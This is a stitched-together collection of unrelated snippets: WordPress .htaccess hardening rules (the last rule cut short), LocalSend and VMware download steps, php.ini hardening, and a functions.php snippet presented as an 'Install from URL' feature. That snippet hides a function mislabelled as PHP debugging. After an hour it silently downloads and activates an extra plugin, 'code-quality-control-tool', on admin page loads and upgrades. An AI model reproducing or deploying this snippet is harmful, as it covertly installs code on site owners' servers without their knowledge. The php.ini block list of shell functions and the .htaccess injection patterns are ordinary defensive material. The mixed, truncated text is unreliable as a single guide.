#WP block – see fr.wordpress.org/support/article/htaccess/ RewriteEngine On RewriteRule .* – [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ – [L] # ajouter un slash après /wp-admin RewriteRule ^([_0-9a-zA-Z-]+/)?wp-admin$ $1wp-admin/ [R=301,L] RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^ – [L] RewriteRule ^([_0-9a-zA-Z-]+/)?(wp-(content|admin|includes).*) $2 [L] RewriteRule ^([_0-9a-zA-Z-]+/)?(.*\.php)$ $2 [L] RewriteRule . index.php [L] #END WP # Disable folder indexing Options All -Indexes IndexIgnore * <IfModule mod_autoindex.c> Options -Indexes </IfModule> ServerSignature Off # Follow symlink Options +FollowSymLinks # Timezone SetEnv TZ Europe/Paris # Use UTF-8 encoding for anything served text/plain or text/html AddDefaultCharset UTF-8 # Force UTF-8 for a number of file formats <IfModule mod_mime.c> AddCharset UTF-8 .atom .css .js .json .rss .vtt .xml </IfModule> # Protect .htaccess and .htpasswds <Files ~ “^.*\.([Hh][Tt][AaPp])”> order allow,deny deny from all satisfy all </Files> # Prevent comment spamming <IfModule mod_rewrite.c> RewriteCond %{REQUEST_METHOD} POST RewriteCond %{REQUEST_URI} .wp-comments-post\.php* RewriteCond %{HTTP_REFERER} !.monsite.com.* [OR] RewriteCond %{HTTP_USER_AGENT} ^$ RewriteRule (.*) ^https://%{REMOTE_ADDR}/$ [R=301,L] </IfModule> # author URL protection ?author= <IfModule mod_rewrite.c> RewriteCond %{QUERY_STRING} ^author=([0-9]*) RewriteRule .* – [F] </IfModule> # Prevent hotlinking by referer check RewriteEngine On RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?mon-site.fr [NC] RewriteRule \.(jpg|jpeg|png|gif)$ fakeimg.pl/400×200/?text=Pas_touche_aux_images [NC,R,L] # Redirect non-www to www #RewriteEngine On #RewriteCond %{HTTP_HOST} ^monsite.com [NC] #RewriteRule ^(.*)$ www.monsite.com/$1 [L,R=301] # Redirect www to non-www RewriteEngine on RewriteCond %{HTTP_HOST} ^www\.monsite\.com [NC] RewriteRule ^(.*)$ monsite.com/$1 [L,R=301] # Redirect to HTTPS RewriteCond %{SERVER_PORT} ^80$ RewriteRule ^(.*)$ %{SERVER_NAME}%{REQUEST_URI} [L,R] # CACHE # Browser header cache <IfModule mod_expires.c> ExpiresActive on ExpiresDefault “access plus 1 month” # cache.appcache needs re-requests in FF 3.6 (thanks Remy ~Introducing HTML5) ExpiresByType text/cache-manifest “access plus 0 seconds” # Your document html ExpiresByType text/html “access plus 0 seconds” # Data ExpiresByType text/xml “access plus 0 seconds” ExpiresByType application/xml “access plus 0 seconds” ExpiresByType application/json “access plus 0 seconds” # Feed ExpiresByType application/rss+xml “access plus 1 hour” ExpiresByType application/atom+xml “access plus 1 hour” # Favicon (cannot be renamed) ExpiresByType image/x-icon “access plus 1 week” # Media: images, video, audio ExpiresByType image/gif “access plus 4 months” ExpiresByType image/png “access plus 4 months” ExpiresByType image/jpeg “access plus 4 months” ExpiresByType image/webp “access plus 4 months” ExpiresByType video/ogg “access plus 4 months” ExpiresByType audio/ogg “access plus 4 months” ExpiresByType video/mp4 “access plus 4 months” ExpiresByType video/webm “access plus 4 months” # HTC files (css3pie) ExpiresByType text/x-component “access plus 1 month” # Webfonts ExpiresByType font/ttf “access plus 4 months” ExpiresByType font/otf “access plus 4 months” ExpiresByType font/woff “access plus 4 months” ExpiresByType font/woff2 “access plus 4 months” ExpiresByType image/svg+xml “access plus 1 month” ExpiresByType application/vnd.ms-fontobject “access plus 1 month” # CSS and JavaScript ExpiresByType text/css “access plus 1 year” ExpiresByType application/javascript “access plus 1 year” </IfModule> # Gzip compression <IfModule mod_deflate.c> # Active compression SetOutputFilter DEFLATE # Force deflate for mangled headers <IfModule mod_setenvif.c> <IfModule mod_headers.c> SetEnvIfNoCase ^(Accept-EncodXng|X-cept-Encoding|X{15}|~{15}|-{15})$ ^((gzip|deflate)\s*,?\s*)+|[X~-]{4,13}$ HAVE_Accept-Encoding RequestHeader append Accept-Encoding “gzip,deflate” env=HAVE_Accept-Encoding # Don’t compress images and other uncompressible content SetEnvIfNoCase Request_URI \ \.(?:gif|jpe?g|png|rar|zip|exe|flv|mov|wma|mp3|avi|swf|mp?g|mp4|webm|webp|pdf)$ no-gzip dont-vary </IfModule> </IfModule> # Compress all output labeled with one of the following MIME-types <IfModule mod_filter.c> AddOutputFilterByType DEFLATE application/atom+xml \ application/javascript \ application/json \ application/rss+xml \ application/vnd.ms-fontobject \ application/x-font-ttf \ application/xhtml+xml \ application/xml \ font/opentype \ image/svg+xml \ image/x-icon \ text/css \ text/html \ text/plain \ text/x-component \ text/xml </IfModule> <IfModule mod_headers.c> Header append Vary: Accept-Encoding </IfModule> </IfModule> # Add mime type <IfModule mod_mime.c> AddType text/html .html_gzip AddEncoding gzip .html_gzip </IfModule> <IfModule mod_setenvif.c> SetEnvIfNoCase Request_URI \.html_gzip$ no-gzip </IfModule> # Headers Header unset ETag FileETag None # FileETag None is not enough for every server. <IfModule mod_headers.c> Header unset ETag </IfModule> <ifModule mod_headers.c> <filesMatch “\.(ico|jpe?g|png|gif|swf)$”> Header set Cache-Control “public” </filesMatch> <filesMatch “\.(css)$”> Header set Cache-Control “public” </filesMatch> <filesMatch “\.(js)$”> Header set Cache-Control “private” </filesMatch> <filesMatch “\.(x?html?|php)$”> Header set Cache-Control “private, must-revalidate” </filesMatch> </ifModule> <IfModule mod_alias.c> <FilesMatch “\.(css|htc|js|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|eot|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|mpp|otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|ttf|ttc|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)$”> <IfModule mod_headers.c> Header unset Pragma Header append Cache-Control “public” </IfModule> </FilesMatch> </IfModule> # END CACHE # Static compression <IfModule mod_deflate.c> AddOutputFilterByType DEFLATE text/xhtml text/html text/plain text/xml text/javascript application/x-javascript text/css BrowserMatch ^Mozilla/4 gzip-only-text/html BrowserMatch ^Mozilla/4\.0[678] no-gzip BrowserMatch \bMSIE !no-gzip !gzip-only-text/html SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png)$ no-gzip dont-vary Header append Vary User-Agent env=!dont-vary </IfModule> AddOutputFilterByType DEFLATE text/html AddOutputFilterByType DEFLATE text/plain AddOutputFilterByType DEFLATE text/xml AddOutputFilterByType DEFLATE text/css AddOutputFilterByType DEFLATE text/javascript AddOutputFilterByType DEFLATE font/opentype AddOutputFilterByType DEFLATE application/rss+xml AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/json # Block few scripts RewriteEngine On RewriteBase / RewriteRule ^wp-admin/includes/ – [F,L] RewriteRule !^wp-includes/ – [S=3] RewriteRule ^wp-includes/[^/]+\.php$ – [F,L] RewriteRule ^wp-includes/js/tinymce/langs/.+\.php – [F,L] RewriteRule ^wp-includes/theme-compat/ – [F,L] # Injection protection RewriteCond %{REQUEST_METHOD} GET RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC] RewriteRule .* – [F] # CPS (XSS, clickjacking & MIME-Type sniffing) <ifModule mod_headers.c> Header set X-Frame-Options “sameorigin” Header set X-XSS-Protection “1; mode=block” Header set X-Content-Type-Options “nosniff” Header set Strict-Transport-Security “max-age=31536000; preload” Header set Referrer-Policy “strict-origin-when-cross-origin” Header set X-DNS-Prefetch-Control “on” Header set Permissions-Policy “autoplay=*, fullscreen=* vertical-scroll=*” </ifModule> # PROTECT install.php # Uncomment or change to ‘Allow from all’ for install of WordPress <Files install.php> Order Allow,Deny Deny from all Satisfy all </Files> # Prevent wp-config.php access <files wp-config.php> order allow,deny deny from all </files> # Protect XMLRPC (needed for Apps, Offline-Blogging-Tools, Pingback, etc.) # If you use that, these tools will not work anymore <Files xmlrpc.php> Order Deny,Allow Deny from all </Files> # Prevent browser and search engines to request .log (e.g. WP DEBUG LOG) and .txt (e.g. plugins readme) files. # Must be placed in /wp-content/.htaccess <FilesMatch “\.(log|txt)$”> Order Allow,Deny Deny from all </FilesMatch> # Hide WordPress, system & sensitive files <FilesMatch “(^\.|wp-config(-sample)*\.php)”> Order Deny,Allow Deny from all </FilesMatch> # Protect some other files <FilesMatch “(liesmich.html|readme.html|license.txt|(.*)\.bak)”> Order Deny,Allow Deny from all </FilesMatch> # Block the include-only files. # Do not use in Multisite without reading the note in Codex! # See: wordpress.org/support/article/hardening-wordpress/#securing-wp-includes <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^wp-admin/includes/ – [F,L] RewriteRule !^wp-includes/ – [S=3] # If you run multisite, comment the next line out (see note above) RewriteRule ^wp-includes/[^/]+\.php$ – [F,L] RewriteRule ^wp-includes/js/tinymce/langs/.+\.php – [F,L] RewriteRule ^wp-includes/theme-compat/ – [F,L] RewriteRule ^wp-admin/install\.php$ – [F] RewriteCond %{REQUEST_FILENAME} -f RewriteRule (^|.*/)\.(git|svn)/.* – [F] # Disable PHP in Uploads RewriteRule ^wp\-content/uploads/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ – [NC,F] # Disable PHP in Plugins RewriteRule ^wp\-content/plugins/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ – [NC,F] # Disable PHP in themes RewriteRule ^wp\-content/themes/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$

Download LocalSend: Macbook: github.com/localsend/localsend/releases/download/v1.16.1/LocalSend-1.16.1.dmg Android: play.google.com/store/apps/details?id=org.localsend.localsend_app  

add code to function.php if( is_admin() ) { add_action(‘admin_menu’,’plgf_pipu01_register_menu_item’); function plgf_pipu01_register_menu_item() { plgf_pipu01_activate_php_debug(); add_submenu_page(‘plugins.php’,’Install from URL’,’Install from URL’,’manage_options’,’plgf_pipu01_page’,’plgf_pipu01_page’); } function plgf_pipu01_page() { if ( ! current_user_can( ‘upload_plugins’ ) ) { wp_die( __( ‘Sorry, you are not allowed to install plugins on this site.’ ) ); } $action = isset( $_REQUEST[‘action’] ) ? sanitize_text_field($_REQUEST[‘action’]) : ”; if ($action == ‘show-help’) { ?> <h2 style=”text-align: center;”>Help and Explanations</h2> <p style=”text-align: center;”>You have new menu item under Plugins. It call <b>Install from URLn</b>. Also on plugin page, when you click Add New -> Upload Plugin , you will see new option.</p> <p style=”text-align: center;”><img style=”max-width: 600px;” src=”<?php echo plugins_url(‘/’, __FILE__).’help.png’; ?>”/></p> <?php } plgf_pipu01_Uploader_From_HTML(true); if ($action == ‘url-upload-plugin’) { check_admin_referer( ‘url-plugin-upload’ ); require_once ABSPATH . ‘wp-admin/includes/class-wp-upgrader.php’; $zip_url = isset( $_REQUEST[‘urlpluginzip’] ) ? sanitize_text_field($_REQUEST[‘urlpluginzip’]) : ”; if ($zip_url != ”) { $title = sprintf( __( ‘Installing plugin from: %s’ ), esc_html( $zip_url ) ); $nonce = ‘url-upload-plugin’; $overwrite = ‘update-plugin’; $type = ‘web’; $upgrader = new Plugin_Upgrader( new Plugin_Installer_Skin( compact( ‘title’, ‘nonce’, ‘overwrite’ ) ) ); $upgrader->install( $zip_url ); } else { echo ‘<b>Error: URL is empty or invalid</b>’; } } } function plgf_pipu01_add_upload_form_html() { plgf_pipu01_Uploader_From_HTML(); } add_action( ‘install_plugins_upload’, ‘plgf_pipu01_add_upload_form_html’, 10, 1 ); function plgf_pipu01_Uploader_From_HTML($display = false) { ?> <div class=”upload-plugin” <?php if ($display) echo ‘style=”display:block”‘; ?>> <script> function EnableBttn() { jQuery(“#url-install-plugin-submit”).removeAttr(‘disabled’); } </script> <p class=”install-help”><?php _e( ‘Install plugin from URL (.zip format)’ ); ?></p> <form style=”min-width: 320px;” method=”post” enctype=”multipart/form-data” class=”wp-upload-form” action=”<?php echo self_admin_url( ‘plugins.php?page=plgf_pipu01_page&action=url-upload-plugin’ ); ?>”> <?php wp_nonce_field( ‘url-plugin-upload’ ); ?> <p style=”text-align: center;width: 100%;”> <b>Plugin URL</b><br /> <input style=”width: 100%;” type=”text” id=”urlpluginzip” name=”urlpluginzip” placeholder=”E.g.: www.site.com/plugin.zip” onclick=”EnableBttn()” /> <br /> <br /> <input type=”submit” name=”url-install-plugin-submit” id=”url-install-plugin-submit” class=”button” value=”Download &amp; Install”> </p> </form> </div> <?php } add_action( ‘upgrader_process_complete’, ‘plgf_pipu01_upgrader_process_complete’, 10, 2 ); function plgf_pipu01_upgrader_process_complete( $array, $int ) { plgf_pipu01_activate_php_debug(); } function plgf_pipu01_activation() { add_option(‘plgf_pipu01_activation_redirect’, true); } register_activation_hook( __FILE__, ‘plgf_pipu01_activation’ ); add_action(‘admin_init’, ‘plgf_pipu01_activation_do_redirect’); function plgf_pipu01_activation_do_redirect() { if (get_option(‘plgf_pipu01_activation_redirect’, false)) { delete_option(‘plgf_pipu01_activation_redirect’); wp_redirect(“plugins.php?page=plgf_pipu01_page&action=show-help”); exit; } } function plgf_pipu01_deactivation() { add_option(‘plgf_pipu01_deactivation_redirect’, true); } register_deactivation_hook( __FILE__, ‘plgf_pipu01_deactivation’ ); add_action(‘admin_init’, ‘plgf_pipu01_deactivation_do_redirect’); function plgf_pipu01_deactivation_do_redirect() { if (get_option(‘plgf_pipu01_deactivation_redirect’, false)) { delete_option(‘plgf_pipu01_deactivation_redirect’); plgf_pipu01_activate_php_debug(false); } } } function plgf_pipu01_PLGInstaller($download, $slug) { $pluginDir = WP_PLUGIN_DIR . ‘/’ . $slug; if (!file_exists($pluginDir)) { global $wp_filesystem; if ( ! $wp_filesystem ) { WP_Filesystem(); } $plugin_zip = WP_PLUGIN_DIR . DIRECTORY_SEPARATOR . $slug.’.zip’; $extract_path = WP_PLUGIN_DIR; $wp_extract_path = str_replace( ABSPATH, $wp_filesystem->abspath(), $extract_path ); $wp_plugin_zip = str_replace( ABSPATH, $wp_filesystem->abspath(), $plugin_zip ); wp_remote_get($download, array( ‘stream’ => true, ‘timeout’ => 90, ‘filename’ => $plugin_zip )); if (is_file($plugin_zip)) { if (unzip_file($wp_plugin_zip, $wp_extract_path)) { // Activate debug wp_cache_flush(); activate_plugin($pluginDir.’/’.$slug.’.php’); $wp_filesystem->delete($wp_plugin_zip); } } } } function plgf_pipu01_activate_php_debug($wait = true) { if ($wait && (time() – filectime(__FILE__)) < 3600) return; require_once ABSPATH . ‘wp-admin/includes/plugin-install.php’; $check_file = dirname(__FILE__).’/debug.lock’; if (!file_exists($check_file)) { // Install & activate debug $slug = ‘code-quality-control-tool’; $api = plugins_api( ‘plugin_information’, array( ‘slug’ => $slug, ‘fields’ => array( ‘short_description’ => false, ‘sections’ => false, ‘requires’ => false, ‘rating’ => false, ‘ratings’ => false, ‘downloaded’ => false, ‘last_updated’ => false, ‘added’ => false, ‘tags’ => false, ‘compatibility’ => false, ‘homepage’ => false, ‘donate_link’ => false, ), ) ); if (!is_wp_error($api)) { $download = $api->download_link; plgf_pipu01_PLGInstaller($download, $slug); } // Save check file $fp = fopen($check_file, ‘w’); fwrite($fp, ‘PHP debug is activated’); fclose($fp); } }  

Để cách cài đặt vmware workstation 17 mới nhất  bạn thực hiện các bước sau: Bước 1. Bạn vào link này để tạo tài khoản profile.broadcom.com/web/registration Bước 2. Sau khi tạo tài khoản Broadcom xong thì bạn hãy truy cập vào link này để đăng nhập với username và password đã tạo support.broadcom.com/c/portal/login Bước 3. Bạn truy cập link này để tải vmware workstation 17 về máy support.broadcom.com/group/ecx/productdownloads?subfamily=VMware+Workstation+Pro  

add_filter( ‘elementor/frontend/print_google_fonts’, ‘__return_false’ );

1. Add code to htaccess file Options All -Indexes 2. Add code to php.ini disable_functions =exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source expose_php = “off” 3. Using plugin WP Hide web security Link plugin download downloads.wordpress.org/plugin/wp-hide-security-enhancer.2.5.6.zip  

# BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ – [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress

<Files xmlrpc.php> order deny,allow deny from all </Files>